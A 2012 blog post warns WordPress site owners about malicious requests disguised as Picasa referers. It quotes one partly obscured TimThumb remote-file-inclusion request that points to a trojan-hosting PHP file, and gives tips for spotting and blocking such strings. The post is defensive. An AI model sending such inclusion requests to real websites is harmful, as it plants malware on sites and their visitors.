Picasa Spoofed for Malware Injection

Hackers Using Picasa Spoof for Web Malware

Strange looking referer URLs and GET requests that appear to be Picasa are being used by hackers to find website vulnerabilities to picasa spoof malwareinject malware or spam. Examining the details of the referer reveals something like this example /wp-content/themes/biznizz/thumb.php?src=http://picasa.com.jcibuenos*****.com.ar/2.php (stars replace the actual characters in string for your safety – leads nowhere). This particular example will inject malware using the WordPress TimThumb exploit. The file 2.php contains a trojan horse!

Picasa is of course picasa.google.com, but the similarity can lead the unwary to disregard the source. These strings are typically long, similar in appearance to a Google search request string. Any URL containing this odd string (or similar) should be regarded as extremely suspicious, and the IP should at least be checked for known bad behaviour and blocked from accessing the website. The string is often seen along with WordPress TimThumb exploit attempts.

Any query string repeating www. is suspicious, although it way have been a user error – often by copy/pasting a link without fully overwriting the existing address, but then at least the first www reference will normally be your blog or website (or a page on it). If a search engne has indexed something like this resulting in a broken link to your site – whoever posted the link probably made a mistake, and it should be re-directed to a suitable page

Spam Comments lead to Infected SItes

The cript injection example could also be modified to  ditrect vistors to sites of this nature by comment spammers. Should Comemnt Spammer succeed in leaving a comment, the link could lead to a website with malware – Viruses or Trojans. I have found several of these malware containing websites the past few weeks. This is another good example of the dangers of comment spam. Spammers are no longer simply trying to SEO their websites through backlinks, they are targeting visitors to the websites and blogs the links are posted on – to infect these visitor’s computers with malware.

PHP File Extensions in Lookup String

The referer string may contain a link to a PHP file – These are active server files (like WordPress uses) and should never be contained in a referer URL string. When these are found, they show a clear attempt to inject malware into your site or blog.

Referrer urls and get requests should seldom use an active file extension – e.g. php as the extension is not required to serve the page. Once again treat GET requests for php files as suspicious UNLESS these are created when you are logged in and editing content or other on-site activities.

me on google plus+Mike Otgaar

About Mike

Web Developer and Techno-geek Saltwater fishing nut Blogger

Posted on March 7, 2012, in General News, Internet Security, Malware and tagged , , , , , , , . Bookmark the permalink. Leave a comment.

Leave a Reply

Please log in using one of these methods to post your comment:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: